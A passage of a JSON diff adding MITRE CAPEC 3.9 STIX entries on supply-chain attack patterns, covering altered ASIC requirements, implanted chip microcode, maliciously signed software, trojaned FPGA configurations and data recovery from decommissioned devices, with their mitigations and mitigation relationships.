In the chip manufacturing process, requirements drive the chip design which, when the chip is fully manufactured, could result in an ASIC which may not meet the user’s needs, contain malicious functionality, or exhibit other anomalous behaviors thereby affecting the intended use of the ASIC.", + "external_references": [ + { + "external_id": "CAPEC-671", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/671.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Requirements for ASIC Functionality Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary with access to ASIC functionality requirements for various customers, targets a particular customer’s ordered lot of ASICs by altering its functional requirements such that the ASIC design will result in a manufactured chip that does not meet the customer’s capability needs." 
+ ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s requirements management system that stores customer requirements for ASICs, requirements upon which the design of the ASIC is based." + ], + "x_capec_skills_required": { + "High": "An adversary would need experience in designing chips based on functional requirements in order to manipulate requirements in such a way that deviations would not be detected in subsequent stages of ASIC manufacture and where intended malicious functionality would be available to the adversary once integrated into a system and fielded." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.", + "id": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acfa1e9-0c32-4214-b7e0-8051b944e4f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for hardware requirements and design.", + "id": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2b255e16-36f0-474d-bfe4-bd6900df7834", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--763090ea-507b-4958-869c-ecfd797d6d26", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that provenance of COTS microelectronic components be known whenever procured.", + "id": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--016cf7ce-9d06-49b6-9680-5f0585b9d9c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": 
"attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f207532a-5fc8-4c50-a7ee-cacc0092f6d7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. 
Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. 
When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28128c02-5503-416d-842c-89eb9c15bd31", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.", + "id": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-672-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + 
"created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--89691446-aa5b-4b3c-9328-d26c0db95284", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bfab0ef2-0fc0-4e7c-a0a5-2eed4b5e3aa0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02819a54-8939-497c-b2eb-faaac80cabf0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Software produced by a reputable developer is clandestinely infected with malicious code and then digitally signed by the unsuspecting developer, where the software has been altered via a compromised software 
development or build process prior to being signed. The receiver or user of the software has no reason to believe that it is anything but legitimate and proceeds to deploy it to organizational systems.\n This attack differs from CAPEC-206, since the developer is inadvertently signing malicious code they believe to be legitimate and which they are unware of any malicious modifications.\n ", + "external_references": [ + { + "external_id": "CAPEC-673", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/673.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Defending Against Software Supply Chain Attacks, 2021--04, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-658", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/sites/default/files/publications/defending_against_software_supply_chain_attacks_508_1.pdf" + }, + { + "description": "Dr. Charles Clancy, Joe Ferraro, Robert A. Martin, Adam G. Pennington, Christopher L. Sledjeski, Dr. Craig J. 
Wiener, Deliver Uncompromised: Securing Critical Software Supply Chains, 2021--01, The MITRE Corporation", + "external_id": "REF-659", + "source_name": "reference_from_CAPEC", + "url": "https://www.mitre.org/publications/technical-papers/deliver-uncompromised-securing-critical-software-supply-chains" + } + ], + "id": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Developer Signing Maliciously Altered Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--69b5d398-114d-437d-a8db-06f1382012b7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Authorization": [ + "Gain Privileges", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Modify Data" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary who has infiltrated an organization’s build environment maliciously alters code intended to be included in a product’s software build via software dependency inclusion, part of the software build process. When the software product has been built, the developer electronically signs the finished product using their signing key. 
The recipient of the software product, an end user/customer, believes the software to reflect the developer’s intent with respect to functionality unaware of the adversary’s malicious intent harbored within.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary would need to have access to a targeted developer’s software development environment, including to their software build processes, where the adversary could ensure code maliciously tainted prior to a build process is included in software packages built." + ], + "x_capec_skills_required": { + "High": "The adversary must have the skills to infiltrate a developer’s software development/build environment and to implant malicious code in developmental software code, a build server, or a software repository containing dependency code, which would be referenced to be included during the software build process." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the IDE that includes: Protecting the IDE via logical isolation using firewall and DMZ technologies/architectures; Maintaining strict security administration and configuration management of configuration management tools, developmental software and dependency code repositories, compilers, and system build tools.", + "id": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8158f676-c4e7-47f8-94d3-fce6ae844da7", + "modified": 
"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c445d7-8a0c-4c4a-82be-e6a3a23980f6", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ intrusion detection and malware detection capabilities on IDE systems where feasible.", + "id": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-673-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e27a3eac-c3d2-4400-b058-e2708bb41600", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96e3d7b-96fe-4a3c-bc99-11721b0042f7", + "target_ref": "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. 
Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + 
"Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." + ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a4ab3ee8-bb69-4118-8ae0-48c15fa7c16d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--78bdd0d5-c5e0-4465-a8e8-2a5245673b43", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management including for FPGA programming and program uploads to FPGA chips.", + "id": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-674-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df0ce1ec-3322-4b0a-9e1d-fa7dcddce433", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9c23bac-b643-4817-b0e5-0b21f4c2dae6", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--228b9edf-0a87-42c6-b3df-817ef320b28f", 
+ "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bbe1a74c-b985-4607-a7aa-6a9cbf724b87", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4f482f0-9628-4ce5-bf90-cc5a98776506", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "target_ref": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary obtains decommissioned, recycled, or discarded systems and devices that can include an organization’s intellectual property, employee data, and other types of controlled information. 
Systems and devices that have reached the end of their lifecycles may be subject to recycle or disposal where they can be exposed to adversarial attempts to retrieve information from internal memory chips and storage devices that are part of the system.\n ", + "external_references": [ + { + "external_id": "CAPEC-675", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/675.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "description": "Exfiltration Over Physical Medium", + "external_id": "T1052", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1052" + }, + { + "description": "Richard Kissel, Andrew Regenscheid, Matthew Scholl, Kevin Stine, NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization, 2014--12, National Institute of Standards and Technology", + "external_id": "REF-663", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf" + }, + { + "description": "Linda Pesante, Christopher King, George Silowash, Disposing of Devices Safely, 2012, CISA United States Computer Emergency Readiness Team (US-CERT)", + "external_id": "REF-717", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/sites/default/files/publications/DisposeDevicesSafely.pdf" + } + ], + "id": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Retrieve Data from Decommissioned Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + 
"attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Accountability": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content." + ], + "x_capec_skills_required": { + "High": "An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.", + "Medium": "An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Backup device data before erasure to retain intellectual property and inside knowledge.", + "id": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Overwrite data on device rather than deleting. Deleted data can still be recovered, even if the device trash can is emptied. Rewriting data removes any trace of the old data. 
Performing multiple overwrites followed by a zeroing of the device (overwriting with all zeros) is good practice.", + "id": "course-of-action--e4ccee19-a356-4c15-93b5-3f564f62c976", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--688300f5-73e3-4855-a5b0-11ef638a7f91", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4ccee19-a356-4c15-93b5-3f564f62c976", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secure erase software.", + "id": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
